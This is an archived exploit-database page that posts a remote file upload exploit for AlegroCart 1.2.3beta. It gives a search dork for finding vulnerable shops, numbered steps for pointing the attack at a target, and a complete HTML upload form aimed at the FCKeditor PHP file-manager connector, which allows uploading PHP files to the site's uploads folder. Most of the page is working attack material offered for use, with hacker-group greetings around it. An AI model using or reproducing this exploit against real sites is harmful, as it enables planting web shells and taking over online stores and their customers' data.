AlegroCart 1.2.3beta Remote Upload File Exploit

Posted on 16 July 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>AlegroCart 1.2.3beta Remote Upload File Exploit</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===============================================
AlegroCart 1.2.3beta Remote Upload File Exploit
===============================================


1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /'             __  /'__`        / \__  /'__`                   0
0  /\_,     ___   /\_/\_      ___  ,_/ /   _ ___           1
1  /_/  /' _ ` / /_/_\_&lt;_  /'___  /    /`'__          0
0       / /    /   / \__/  \_  \_   /           1
1       \_ \_ \_\_   \____/ \____\ \__\ \____/ \_           0
0       /_//_//_/ \_ /___/  /____/ /__/ /___/  /_/           1
1                   \____/ &gt;&gt; Exploit database separated by exploit   0
0                   /___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                    #######################################           1
0                    I'm indoushka member from Inj3ct0r Team           1
1                    #######################################           0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

######################################################################## 

# Vendor: http://www.alegrocart.com/

# Date: 2010-05-27 

# Author : indoushka 

# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! 

# Contact : indoushka@hotmail.com 

# Home : www.arab-blackhat.co.cc

# Bug  :Remote Upload File Exploit

# Tested on : windows SP2 Français V.(Pnx2 2.0) 
######################################################################## 
                                                                                                                               
# Dork : Powered By Alegro Cart    
                                                                 
# Exploit By indoushka 

1 - 

[~] 1.Save code html format

[~] 2.Search Target.com

[~] 3.Edit and replace &amp; Target

[~] 4.Save Html Page

[~] 5.Open Page Html (Edite Source)

[~] 6.Set Format PHP

[~] 7.Choose File &amp; Upload

[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)

[~] 9.Target.com/images/uploads/File/File Name


2 - code html format

&lt;head&gt;
&lt;title&gt;FCKeditor - By indoushka&lt;/title&gt;
&lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot;&gt;

&lt;/head&gt;
&lt;body&gt;
&lt;table height=&quot;100%&quot; cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; width=&quot;100%&quot;
border=&quot;0&quot;&gt;
&lt;tr&gt;

&lt;td&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; border=&quot;0&quot;&gt;
&lt;tr&gt;
&lt;td&gt;
Connector:&lt;br /&gt;
&lt;select id=&quot;cmbConnector&quot; name=&quot;cmbConnector&quot;&gt;
&lt;option value=&quot;asp/connector.asp&quot; selected=&quot;selected&quot;&gt;ASP&lt;/option&gt;
&lt;option value=&quot;aspx/connector.aspx&quot;&gt;ASP.Net&lt;/option&gt;

&lt;option value=&quot;cfm/connector.cfm&quot;&gt;ColdFusion&lt;/option&gt;
&lt;option value=&quot;lasso/connector.lasso&quot;&gt;Lasso&lt;/option&gt;
&lt;option value=&quot;perl/connector.cgi&quot;&gt;Perl&lt;/option&gt;
&lt;option value=&quot;
http://127.0.0.1/AlegroCart/admin/javascript/fckeditor/editor/filemanager/connectors/php/connector.php
&quot;&gt;PHP&lt;/option&gt;
&lt;option value=&quot;py/connector.py&quot;&gt;Python&lt;/option&gt;
&lt;/select&gt;

&lt;/td&gt;
&lt;td&gt;
   &lt;/td&gt;
&lt;td&gt;
Current Folder&lt;br /&gt;
&lt;input id=&quot;txtFolder&quot; type=&quot;text&quot; value=&quot;/&quot; name=&quot;txtFolder&quot; /&gt;&lt;/td&gt;
&lt;td&gt;
   &lt;/td&gt;

&lt;td&gt;
Resource Type&lt;br /&gt;
&lt;select id=&quot;cmbType&quot; name=&quot;cmbType&quot;&gt;
&lt;option value=&quot;File&quot; selected=&quot;selected&quot;&gt;File&lt;/option&gt;
&lt;option value=&quot;Image&quot;&gt;Image&lt;/option&gt;
&lt;option value=&quot;Flash&quot;&gt;Flash&lt;/option&gt;
&lt;option value=&quot;Media&quot;&gt;Media&lt;/option&gt;

&lt;option value=&quot;Invalid&quot;&gt;Invalid Type (for testing)&lt;/option&gt;
&lt;/select&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br /&gt;
&lt;table cellspacing=&quot;0&quot; cellpadding=&quot;0&quot; border=&quot;0&quot;&gt;
&lt;tr&gt;

&lt;td valign=&quot;top&quot;&gt;
&lt;a href=&quot;#&quot; onclick=&quot;GetFolders();&quot;&gt;Get Folders&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
   &lt;/td&gt;
&lt;td valign=&quot;top&quot;&gt;
&lt;a href=&quot;#&quot; onclick=&quot;GetFoldersAndFiles();&quot;&gt;Get Folders and Files&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
   &lt;/td&gt;

&lt;td valign=&quot;top&quot;&gt;
&lt;a href=&quot;#&quot; onclick=&quot;CreateFolder();&quot;&gt;Create Folder&lt;/a&gt;&lt;/td&gt;
&lt;td&gt;
   &lt;/td&gt;
&lt;td valign=&quot;top&quot;&gt;
&lt;form id=&quot;frmUpload&quot; action=&quot;&quot; target=&quot;eRunningFrame&quot; method=&quot;post&quot;
enctype=&quot;multipart/form-data&quot;&gt;
File Upload&lt;br /&gt;
&lt;input id=&quot;txtFileUpload&quot; type=&quot;file&quot; name=&quot;NewFile&quot; /&gt;

&lt;input type=&quot;submit&quot; value=&quot;Upload&quot; onclick=&quot;SetAction();&quot; /&gt;
&lt;/form&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;br /&gt;
URL: &lt;span id=&quot;eUrl&quot;&gt;&lt;/span&gt;
&lt;/td&gt;

&lt;/tr&gt;
&lt;tr&gt;
&lt;td height=&quot;100%&quot; valign=&quot;top&quot;&gt;
&lt;iframe id=&quot;eRunningFrame&quot; src=&quot;javascript:void(0)&quot; name=&quot;eRunningFrame&quot;
width=&quot;100%&quot;
height=&quot;100%&quot;&gt;&lt;/iframe&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/table&gt;
&lt;/body&gt;
&lt;/html&gt;

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================
all my friend :
His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
(cr4wl3r Let the poor live ) * RoAd_KiLlEr * AnGeL25dZ * ViRuS_Ra3cH
---------------------------------------------------------------------------------------------------------------------------------


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-07-16]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
TOP
Malware :

Last 20
Exploits :

Last 20